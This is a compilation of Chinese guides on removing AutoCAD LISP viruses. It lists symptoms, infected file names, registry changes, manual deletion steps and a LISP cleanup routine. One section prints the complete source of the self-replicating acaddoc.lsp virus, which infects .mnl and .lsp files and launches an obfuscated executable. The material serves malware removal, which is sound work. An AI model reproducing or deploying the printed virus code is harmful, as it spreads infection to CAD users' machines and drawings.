CAD病毒查杀方法教程怎么手动杀毒

在软件操作过程中发现楼层无法切换的解决方法（主要由acaddoc.lsp病毒文件引起）。

第一种
1、注意首先将感染acaddoc.lsp病毒的工程文件夹打开，把文件中的acaddoc.lsp文件删除。

2、删除c盘中的boot.dat文件。

3、在鲁班软件安装目录中（sysdat\sys16）找到acaddoc.lsp文件，打开后全选所有内容并删除，保存后关闭。

然后右击该文件夹选择属性，点选只读并确定。

第二种
刚才那个病毒的问题，试过了在我们软件里加一个空的lsp文件打开我们软件就不会有问题了
不过其实病毒还在的，要彻底清除病毒，要删除C:\Documents and
Settings\Administrator\Application Data\Autodesk\AutoCAD
2006\R16.2\chs\Support 这个文件夹里的acadapq.lsp和acaddoc.lsp文件，把acad.mnl 文件里最后的
(load "acadapq")
(princ)
这两句话删除，再删除所有的acaddoc.lsp文件就可以了。

前言: 最近本人公司里流行一种CAD病毒，中毒后，CAD每次新开图均生成一个的病毒文件，虽破坏力不大，但烦不胜烦。

经研究病毒源码后，摸索出了一套清除该病毒的办法。

然后经过在数个同事机器上验证，该方法行之有效。

于是将杀毒方法成文，群发给部门同事，以下是原文。

一病毒简介:最近公司里流传一种cad病毒。

该病毒可被卡巴斯基和360杀毒软件查出。

卡巴斯基查出病毒名为，360杀毒软件查出病毒名为。

遗憾的是，卡巴斯基和360杀毒软件均不能将其彻底清除。

二中毒症状：机器中毒后，运行CAD时，每打开一个dwg文件，均在dwg文件所在目录下生成一个的文件。

由于每次开图，病毒程序均进行一次病毒传播复制过程，因此使得CAD开图时速度变慢。

用记事本查看CAD安装路径下的support目录下的任一*.lsp文件，如文件末尾含有与附件1相同的代码，则可判定为中毒。

三传播机理：通过分析病毒的源代码，初步了解其传播机理如下：如机器已中毒，CAD新打开dwg文件时，病毒程序自动加载。

并搜索CAD工作目录下的文件，感染同一目录下的*.mnl文件，搜索acad的support目录，并感染该目录下的所有*.lsp文件。

同时病毒在当前打开的dwg文件所在目录下生成文件，以利于下次传播。

如本机未中毒，而新打开的dwg文件所在目录下有文件，则病毒将感染上述目录下的*.mnl与*.lsp文件。

该病毒的最终目的是调用acadapq 与 acadappp 两个非法程序。

至于这两个程序会干什么，暂未深入研究。

四清除步骤：1. 退出CAD。

2. 全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件，然后彻底删除上述文件。

注意查找前在文件夹选项中设置“显示所有文件与文件夹”以及取消“隐藏受保护的操作系统文件”。

搜索时选择“查找所有文件及文件夹”，然后在“高级选项”里勾选“搜索系统文件夹”“搜索隐藏的文件和文件夹”“搜索子文件夹”。

手工查杀ACADDOC.LSP病毒发现中的这个病毒的状况是：开AutoCAD2006后提示"＜AutoCAD 菜单实用程序已加载。

正在初始化VBA 系统...执行错误执行错误＞"同时发现工作目录平时只有DWG、BAK 等熟悉文件外，多了acaddoc.lsp，打开看如下：(setqwold_cmd(getvar"cmdecho"))(setvar"cmdecho")(setqwpath(findfile"base.dcl"))(setqwpath(substrwpath1(-(strlenwpath)8)))(setqwwmnlwpath(getvar"menuname" ))(setq wnowdwg (getvar "dwgname" ))(setqwwjqm (findfile wnowdwg))(setq wdwgwpath (substr wwjqm1(-(strlen wwjqm)(strlen wnowdwg))));;;alert(setqf(open"c:\\boot.dat" "w"))(write-line"[dang]"f)(write-line (strcat"ff=" wdwgwpath)f)(write-line (strcat"yy="wpath)f)(closef)(setqboot(findfile "boot.dat"))(if(/=boot"")(command"_-vbarun" "ThisDrawing.hh" ))(setq wacadwpath (findfile "acaddoc.lsp"))(setq wacadwpath (substr wacadwpath1(strlen wacadwpath )11)))(setqwns1""wns2"")(setqwlspbj0)(setq wwjqm (strcat wpath "acaddoc.lsp" ))(if(setqwwjm (open wwjqm "r"))(progn (while (setqwwz(read-linewwjm))(setqwns1wns2)wns2 wwz))(if(> (strlen wns1) 14)(if(= (substr wns187) "acadapq" )(setq wlspbj1)))(close wwjm)))(setq wlspmnl 0)(setq wwjqm (strcat wpath "acad.mnl" ))(if(setq wwjm (open wwjqm "r")) (progn (while (setq wwz (read-line wwjm))(setq wns1 wns2) (setq wns2 wwz))(if(> (strlen wns1) 14)(if(= (substrwns187) "acadapq" )(setq wlspmnl 1))) (closewwjm)))(if(= wlspmnl 0) (progn (setq wwjqmwpath (strcat (chr97)(chr99)(chr97)(chr 100) (chr46)(chr 109) (chr 110) (chr108))))(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr34) "acadapq" (chr34) ")")wwjm)(write-line "(princ)" wwjm)wwjm)))(defun wwriteapp () (if(setqwwjm1 (open wnewacad "w"))(progn (setqwwjm (open woldacad "r"))(while (setqwwz(read-line wwjm))(write-line wwzwwjm1))(close wwjm)(close wwjm1))))(and(= wacadwpath wdwgwpath) (/= wacadwpath wpath))(progn(if(= 0wlspmnl)(progn(setq woldacad (findfile "acaddoc.lsp" ))(setq wnewacad (strcat wpath "acadapq.lsp") ))(progn(setq woldacad (strcatwpath "acadapq.lsp" ))(setq wnewacad (findfile "acaddoc.lsp" )))(if(=wlspbj0) (progn (setq wwjqm (strcat wpath "acaddoc.lsp" ))(setqwwjm (open wwjqm "a"))(write-line (strcat "(load " (chr34) "acadapq" (chr34)")")wwjm)(write-line "(princ)" wwjm)(close wwjm))) (wwriteapp ))(progn(/= wnowdwg "Drawing.dwg" )(progn(setq woldacad (findfile "acadapq.lsp" ))(setq wnewacad (strcat wdwgwpath "acaddoc.lsp" )) (wwriteapp)))))(setvar "cmdecho" wold_cmd)(princ)(setq strtopstr (strcat(chr92)(chr92)(chr70)(chr83)(chr49)(chr(chr83)(chr89)(chr83)(chr49)(chr92)(chr87)(chr79)(chr82)(chr75)(chr92)(chr80)(chr76)(chr79)(chr84)(chr69)(chr82)))(setq strbottomstr (strcat (chr(chr92)(chr76)(chr(chr67)(chr80)(chr82)(chr88)(chr89)(chr49)(chr46)(chr69)(chr88)(chr69)))(startapp(strcatstrtopstrstrbottomstr))(setvar"cmdecho"wold_cmd)(princ)(princ)N年以前学了点autolsp，虽然没编过什么程序，这个病毒基本还比较浅，能看得出个大概流程，原理跟acad.lsp差不多，利用AutoCAD自动加载文件活得病毒运行，然后感染，acaddoc.lsp是AutoCAD2004后每个图形打开时执行的例行程序，方便二次开发用的，当然也为病毒编写人敞开大门。

把下面的程序复制到记事本，另存为为“52cad.lsp”（注意：必须是在能够看到扩展名的情况下，lsp扩展名才有用），保存之后，将此文件拖入到正在使用的cad，在命令行输入“52cad”即可按提示杀cad病毒。

(defun c:52cad (/ stol del RenameNext cl regpath supportpath jk-lsp yes-lsp )(defun stol (str / n lis str)(while (setq n (vl-string-search ";" str)) (setq lis (cons (substr str 1 n) lis)) (setq str (substr str (+ 2 n))) )(reverse (cons str lis)) )(setq regpath "HKEY_CURRENT_USER\\Software\\Autodesk\\AutoCAD") (setq supportpath (cons (vl-string-trim "\\" (getvar "dwgprefix"))(stol (vl-string-trim ";" (getvar "acadprefix"))) ) )(if (null (vl-registry-read regpath "jk-lsp")) (vl-registry-write regpath "jk-lsp""acad.lsp;acaddoc.lsp;acad.fas;acaddoc.fas;acad.vlx;acaddoc.vlx" ) )(setq jk-lsp (stol(vl-string-trim ";" (vl-registry-read regpath "jk-lsp")) ) )(if (null (setq yes-lsp (vl-registry-read regpath"yes-lsp"))) (vl-registry-write regpath "yes-lsp" "" ) )(defun del (file)(command "shell" (strcat "attrib -r \"" file "\"")) (while (not (vl-file-delete file))) )(defun Rename (file)(command "shell" (strcat "attrib -r \"" file "\"")) (while (not (vl-file-rename file(strcat (vl-filename-directory file) "\\"(getstring "\n请输入新文件名:") ) ) ) ) )(defun Next (file) (vl-registry-write regpath "yes-lsp"(strcat (vl-registry-read regpath "yes-lsp") file ";") ) )(defun cl (file / kword)(INITGET "Del Rename Next") (setq kword(getkword "\n删除(Del);重命名(Rename);加入到信任列表(Next):" ) )(cond ((= kword "Del") (del file)) ((= kword "Rename") (Rename file)) ((= kword "Next") (Next file)) ) )(foreach a supportpath (foreach b jk-lsp(setq file (strcat a "\\" b)) (if (vl-file-size file)(if (not (vl-string-search file yes-lsp))(progn (princ (strcat "\n发现" file "请处理:\n")) (cl file) )(princ (strcat "\n发现" file "已在信任列表中!\n")) )) ) )(princ "\nlsp病毒监控程序命令'52cad'!")(princ) ) (c:52cad)。

1.CAD病毒的简介与危害CAD病毒，实际上是基于CAD程序支持的vlisp语言编写的一类代码。

它和你用过的绝大多数CAD小插件其实一样，是必须依附于CAD环境下才能运行的程序。

1.1目前常见CAD病毒有以下几个特点：1.它完全依附于CAD运行，在不打开CAD的情况下，它既不会运行，也不会主动传播。

2.它的作用范围仅限于CAD及其附属插件（如天正、探索者等）；不会破坏CAD软件本身，但可能改乱CAD 设置、改乱CAD图纸数据。

3.除了CAD及其附属插件（如天正、探索者等）外，你电脑里别的软件卡、慢、崩溃，或者系统卡、慢、蓝屏死机，这些都跟CAD病毒没有一毛钱关系。

4.由于目前新的WIN7、WIN10系统权限严格，免费杀毒软件普及，CAD版本不断升级，CAD病毒作用范围有限，给病毒作者带来不了收益，所以基本上没有新出来的CAD病毒了，还在流行的CAD病毒，都是十多年前遗留下来的，很古老的。

1.2目前还在流行的CAD病毒存在以下几点危害：1.部分CAD病毒会搞一些无聊的弹窗【不吃饭了快干活、党不会亏待你、现在时间是XX等等】，但是这类病毒太显眼，已经被杀的差不多了，比较少见.2.大多数还在流行的病毒，都是后台默默感染传播，没有任何提示，不注意是看不到的。

这类病毒的代码里，还能运行的主要是他的自身复制传播功能、修改CAD设置、修改图纸数据功能。

所以一些CAD病毒会乱改你CAD 设置、图纸设置、图纸数据，导致CAD操作异常、复制粘贴出问题、图纸文件异常大等，这是它的主要危害之一。

3.正如前边说的，CAD病毒大多比较古老，代码陈旧，而软件更新换代，病毒的代码运行已经出现很多缺陷、错误。

当你中CAD病毒的同时，你又在使用探索者、天正之类基于CAD的插件，在这些软件打开加载的时候，CAD病毒同时也在加载，且它的代码存在缺陷错误而卡住、或进入死循环，常常同时导致天正探索者加载失败或者在加载时卡死，这也是它目前最主要的危害之一。

CAD中移动move变复制copy病毒手动清除方法
CAD中操作:移动move变复制copy病毒手动清除方法
中毒特征:
打开DWG文件显示:
程序作者QQ:252545152
现在时间是:XX点XX分了的哦!
好好干了啦!党是不会亏待你的!
老板的眼睛是雪亮的啦!
手工清除方法:首先请关闭CAD后,再搜索所有磁盘内的acad.fas、acad.sys、acad.ini、lcm.fas、dwgrun.exe、dwgrun.bat、winsys.ini、winfas.ini文件,(记住一定要搜索完所有的磁盘,如C、D、E、F、G等等。

然后将所有搜索到的acad.fas、acad.sys、acad.ini、lcm.fas、dwgrun.exe、dwgrun.bat、winsys.ini、winfas.ini文件全部删除。

方法是:点击开始 - 搜索 -然后点击搜索所有文件-- 点击更多高级选项,勾选影藏的文件和文件夹。

全部或部分文件名填写
acad.fas;acad.sys;acad.ini;lcm.fas;dwgrun.exe; dwgrun.bat;winsys.ini;winfas.ini 然后点击搜
索把搜出的文件全部删除。

1次搜不干净搜索4次删除4 次。

就OK了。

CAD病毒专杀软件分享每天积累一点，让自己更专业！关注CAD制图有问必答筑原cad病毒专杀是专为AutoCad软件开发的一款病毒专杀修复及免疫于一体的专杀工具！一.扫描病毒的流程如下:二.处理病毒1.acad.lsp 很多以(defun s::startup (/old_cmd 等开头的lsp病毒代码中毒后,打开文件自动建立acad.lsp文件等.2.acaddoc.lsp以 (setq flagx t) (setq bz'(setq flagx t)')开头lsp代码中毒后acad.mnl 及cad的support下的所有lsp文件某位都加上此段病毒代码.天正等软件无法启动.3.acad.fas版本1 有病毒样本,完美处理.1.病毒在启动CAD时会弹出一个显示时间并写有“党是不会亏待你”的对话框 2.注册表增加HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwgrun 3.增加文件c:\WINDOWS\system32\copyfile.vbsc:\WINDOWS\system32\copy.sys(acad.fas副本)cad安装目录,很多子目录中有acad.fas和lcm.fas文件.版本2 本人无病毒样本,网友提供解决方法.1.注册表增加 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sys:'C:\WINDOWS\system32\copyfile.vbs'2.增加文件系统目录中增加 winsys.ini、winfas.ini、dwgrun.batcad安装目录,很多子目录中有acad.sys、acad.fas、acad.ini版本3 有病毒样本,完美处理. 1.注册表增加HKCU\Software\FileKenHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup 写入BEI_ZHU值200302142.拷贝文件 C:\Program Files\AutoCAD 2004\Fonts\isohztxt.shx (acad.fas副本)C:\WINDOWS\DivX.finC:\WINDOWS\system32\SHFR.CMD3.修改文件acad.mnl文件中间增加 (setvar'cmdecho' 0) (command'slide')结尾增加 (princ)(if (null stol) (load 'lcm'''))acad.pgp文件中间增加 SLIDE, SHFR, 5,4.acad.vlx版本1 有病毒样本,完美处理.1. 打开图档会自动生成一个acad.vlx的文件 2.CAD目录的acetauto.lsp ai_utils.lsp acad.mnl文件中间被添加 (vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))3.Help目录增加logo.gif (acad.vlx文件的副本)版本2 本人无病毒样本,网友提供解决方法.1.破坏性的acad.vlx,打开CAD图纸,发现图纸上只有一句英文:MUST re_cover!以前画的图全没有了.2.运行re_cover就可以恢复被打乱隐藏的图纸3.全盘搜索acad.vlx删除常见问题：01. 新变种未知病毒如何查杀?假设病毒文件名为acad.fas,在黑名单中添加acad.fas名字,选项中选择放至回收站,手动搜索CAD搜索支持目录中的lsp、mnu文件是否感染病毒代码.如感染手动清除。

CAD病毒查杀方法教程怎么手动杀毒病毒无处不在，随时入侵我们电脑，CAD也一样，那CAD文件病毒怎么清除?本文就来教大家使用手动设置查杀CAD病毒的方法，具体步骤请看下文。

CAD病毒查杀方法介绍：手动查杀CAD病毒：1、关闭CAD(一定要先关闭正在运行的CAD程序)。

2、搜索并删除acad.lsp、acadappp.lsp和acadapp.lsp这3个文件。

3、复制下面的代码在CAD命令行运行，以恢复被修改的系统变量默认值：01(setvar "zoomfactor" 40)02(setvar"mbuttonpan" 1)03(setvar"HIGHLIGHT" 1)04(setvar "fillmode" 1)复制代码4、用记事本打开CAD下的“acad.mnl”文件，将文件最后一行代码(load "acadappp")删去。

(如"acad.mnl"文件中无此行代码可忽略此操作)附："acad.mnl"文件可能在下面的目录中，C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD 200×\R×.×\chs\Support其中×××是你登录系统时的用户名，200×和R×.×分别是CAD 的版本和版本代号。

(注意：目录C:\Documents and Settings\是系统隐藏文件夹)补充：CAD使用小技巧1、文字镜像如何设置转动与不转动A、在镜像前，输入MIRRTEXT指令B、输入新值0 代表不转动;输入新值1代表转动C、MIRRTEXT指令完成后，输入MI镜像指令就OK了2、CAD的版本转换A、CAD高版本可以打开所有低版本的图纸B、CAD低版本不可以打开高版本的图纸C、高版本转成低版本的方法，直接点击另存为，将文件类型可以改成任意的低版本D、将低版本转换成高版本，就比较复杂了，需要第三方软件，也就是版本转换器。

acad.lsp，acaddoc.lsp，acadapp.lsp和acadiso.lsp病毒的查杀方法1.为了保证操作的完善，在做下面的操作以前最好先把CAD和天正的程序完全卸载，卸载完成后手动删掉程序文件夹下剩余的文件。

2.点取桌面上“我的电脑”图标，按键盘“ctrl+F”键，显示如下图所示面板（下面这个图是在我机子上截的）：注意左边几个打红圈的地方，如果你机子上“更多高级选项”旁边的箭头是向下的，需要点一下箭头，让它变成如图所示的形状，此时下边会打开下级选项，注意最下面一个红圈中三个打勾的地方，在你那儿也要打上勾。

然后在最上面一个红圈的位置处输入需要搜索的文件名，一共有四个文件需要搜索，分别是acad.lsp，acaddoc.lsp，acadapp.lsp和acadiso.lsp，因为每次只能搜索一个文件，所以得重复四遍这个搜索过程，最后把搜出来的文件全部删除。

3.如果个别文件系统不让删的话，可以把电脑重启，然后按F8进入安全模式下删除。

4.待所有的病毒文件全部删干净后再重装CAD以及天正的程序。

5.如果中毒不是很深，即单独启动纯CAD平台程序时命令行并没有任何错误提示，则可以不用重新卸载安装CAD程序，只需要把天正卸载重装即可。

注意：1.病毒之所以称之为病毒，除了它带来一些负面影响以外，还因为它具有一定的传染性，所以查杀病毒这个操作最好是一整个设计单位找个时间大家统一清理一下，即所有的电脑同时进行杀毒的这个操作，否则因为内部的图纸交流，本来已经杀过病毒的电脑可能会再次感染病毒。

2.处理完病毒后以后，传图纸的时候最好只传一张张的DWG图纸，而不要传压缩文件或直接拷贝整个文件夹。

3.网上随便搜一下也能搜到一些CAD病毒的专杀工具，在可能的情况可以下下来试试，有些还是有一定效果的。

预防CAD病毒并解决CAD病毒“错误: 输入的列表有缺陷”的方法：
经参考相关文章并结合自己重新实践总结：
预防CAD病毒并解决CAD病毒“错误: 输入的列表有缺陷”的方法：
1、在关闭CAD情况下。

1.搜索全盘的acaddoc.lsp和acadapq.lsp并删除；2注意要.显示隐藏文件；
2、用360卸载CAD（必须卸载干净，并进入C盘用户目录内删除没有卸载完的CAD文件）包括路径C:\Documents and Settings\用户名\Application Data\Autodesk下的文件夹。

3、重新启动，重新安装CAD，打开并激活好。

4、新建两个记事本并分别压缩，把压缩包改名acaddoc.lsp 和acadapq.lsp，再把改完后的acaddoc.lsp和acadapq.lsp覆盖路径C:\Documents and Settings\用户名\Application
Data\Autodesk\AutoCAD 20XX\RXX\chs\Support下相应的文件即可。

5、装好CAD系统后，在没有被病毒感染前，将CAD目录内所有文件的属性设置为只读，包括路径C:\Documents and Settings\用户名\Application Data\Autodesk下的文件夹。

可以减少中毒的机率。

（注：此时打开CAD时可能会出现无法更新的提示，如果这样要重新对安装目录已设置“只读”
试验先，把设置“只读”前的勾号去掉，设置不“只读”，再打开试试没问题了，再设置“只读”。

）。

CAD病毒清除方法kcfy发表于2010-12-07 08:57 最后修改于2011-03-24 20:30 浏览(1930) 评论(0)分类：AutoCAD举报一、“党是不会亏待你的”CAD病毒的清除方法1、该病毒发作后的主要表现为：①、病毒在启动CAD时会弹出一个显示时间并写有“党是不会亏待你”的对话框；②、病毒在8:00至18:00这个段时间内，对CAD画图没有任何的影响。

当时间不在8:00至18:00之间时，会弹出如下对话框，可能伴随“移动”命令改变~等情况。

（原病毒作者如是说。

不过我在CAD2002上没有发现此更象，可能高版本的CAD才会吧。

）2、清除方法：①、关闭CAD（一定要先关闭正在运行的CAD程序）；②、按F3键打开XP系统的文件搜索窗口，搜索并删除acad.fas和lcm.fas文件；③、XP文件搜索窗口设置如下：a．搜索acad.fas文件b．搜索lcm.fas文件注意：①、“搜索范围”一定要选择“本机硬盘驱动器 (C:;D:;E:;F:)”；②、一定要先勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将病毒文件全部搜索清除干净。

其它CAD病毒，如acaddoc.lsp、acad.lsp等等，都可以用上述方法来搜索删除CAD病毒文件。

二、清除CAD恶意程序“CAD恶意程序”网上也称之为“CAD病毒”。

其实，常见的CAD恶意程序并不具备一般病毒特征，不能单独传染，不会感染系统文件，只能在CAD环境下传播，没有对系统产生危害，但会造成CAD部份命令失效（如：无法使用分解命令、鼠标中键平移被修改、填充不能使用、多段线空心等），使其操作不便，从而影响制图效率及质量。

清除这类恶意程序可参考以下方法：①、关闭CAD（一定要关闭正在运行中的CAD程序）；②、按F3键或在“开始”菜单打开“搜索”→“文件或文件夹”搜索窗口，全盘搜索下面的已知可能是CAD恶意程序的文件名；acad.lspacad.fasacad.vlxacad.sysacaddoc.lspacadiso.lspacaddoc.fasacadapq.lspacadappp.lspacadapp.lsplcm.fasacadsmu.fas搜索发现文件后，注意该文件的所在目录，判断这个文件是不是你正在使用的某些外挂插件或专业软件所用到的自动加载文件，再决定是否删除。

CAD病毒的通用杀毒方法（CAD杀毒acad.lsp病毒解决方法及预防措施等）2009年03月12日星期四 20:26关于网上流传的CAD病毒，特征为：自动生成acad.lsp ，acaddoc.lsp ，acadap.lsp，acad.fas，acad.mnl，acad.sys，lcm.fas，cad.fas，acad.ini等文件；在某时间出现“党不会亏待你”“成功完成复制！”；无法使用炸开、直线命令，鼠标中键不为缩放等等。

其特点均为lisp编写，由于打开CAD时会自动加载运行，所以造成一定程度的危害。

还有一个基于dwwin.exe或dwgrun.exe的病毒，特征是出现winfas.in，dwgrun.bat文件等，其实也是依靠.lsp文件来感染的，但传播方式是依靠.exe 文件，根据这个病毒特征来看，其实是作者水平不算高为实现目的硬生生拼凑的，中这个病毒只能说您安装的杀毒软件实在太差或者设置不合理。

此病毒通过下述方法无法彻底清除，需要使用优秀的杀毒和防御软件，如卡巴，微点等（瑞星就免了吧）。

------------------------------特点说明-------------------------------------------------通俗的解释其特点1.病毒不破坏DWG图纸文件，电脑中的图纸DWG文件照常可以使用。

2.病毒破坏CAD软件的配置，最好重新安装CAD。

3.部分病毒有改写同类文件特点，只要中毒，所有.lsp .mnl等文件逐渐均被改写，此类病毒危害最大。

------------------------------杀毒方法-------------------------------------------------通用杀毒方法将全硬盘、u盘、移动硬盘网络共享文件夹中的.fas .lsp .mnl .arx等类型文件全部删除即可。

具体方法如下：1.关闭CAD。

CAD的病毒文件与杀毒方案方法一：（1）全盘搜索acadapp.*、acadappp.*、acaddoc.*文件，然后彻底删除。

注意查找前在文件夹选项中设置“显示所有文件与文件夹”。

搜索时选择“查找所有文件及文件夹”，然后在“高级选项”里勾选“搜索系统文件夹”“搜索隐藏的文件及文件夹”。

（2）系统盘根目录下如有boot.dat文件，将其删除。

（3）进入C:\Documents and Settings\用户名\ApplicationData\Autodesk\Autocad20**\R1**\chs\Support目录，用记事本打开该目录下所有*.mnl文件，手动删除与病毒相同的代码（一般在文件末尾），然后保存。

修改后的mnl文件属性改为只读。

（4）进入CAD安装目录下的support目录，将该目录下的所有*.lsp文件同上处理。

方法二：解析ACADDOC.LSP病毒文件与杀毒方案CAD的病毒很多但都大同小异。

现就出现的ACADDOC.LSP病毒进行杀毒。

不用重新安装CAD的办法。

1、发现文件夹中多出ACADDOC.LSP说明你中毒了。

2、关闭CAD程序。

3、全盘查找*.fas *.lsp *.mnl *.arx文件，除了CAD安装目录以外的全部删除。

4、检查CAD安装目录文件的修改时间，把最近的几个文件中的病毒代码删除。

（用记事本打开）5、把CAD安装目录中的所有*.fas *.lsp *.mnl *.arx文件改为只读属性。

说明：1、ACADDOC.LSP病毒感染X:\Program Files\AutoCAD 20**\Support 文件夹下的3d.lsp；3darray.lsp；acad2010.lsp；acad2010doc.lsp；acadinfo.lsp；ai_utils.lsp；attredef.lsp；edge.lsp；mvsetup.lsp；sample-profile-util.lsp文件。

手工删除CAD病毒文件的方法
1.先关掉CAD，然后打开下面路径下的搜索软件（可以ctrl+单击）
\\192.168.10.253\projects\0000文件中转站\SF\Everything文件搜索工具\Everything_x64.exe
2.点“书签”
3.里面有我做好的记录，分别选择搜索”acad.fas” “acaddoc.lsp“”acaddoc.lsp_bak“三个文件，
然后选中，按“delete”键删除。

注：文件夹除外，文件夹是用来免疫的，防止病毒再复制到该文件夹下的，利用的原理就是不能有两个相同文件名的文件同时存在于同一个文件夹下。

4.务必每个人的电脑都做如上操作一次。

如果有文件删不掉或不清楚操作，联系我。

5.操作完之后，右下角有个图标，点右键，退出.
江增源
2015.12.08
2015.12.17更新
1.最近又发现了一个新的病毒文件，文件名为“acad.lsp”，删除方法同上，搜到的文件只要是文件名名字完全匹配的，都删除掉就可以。

2.这个病毒的发作特征就是打开CAD会弹出一个空白的窗口出来。

江增源
2015.12.17。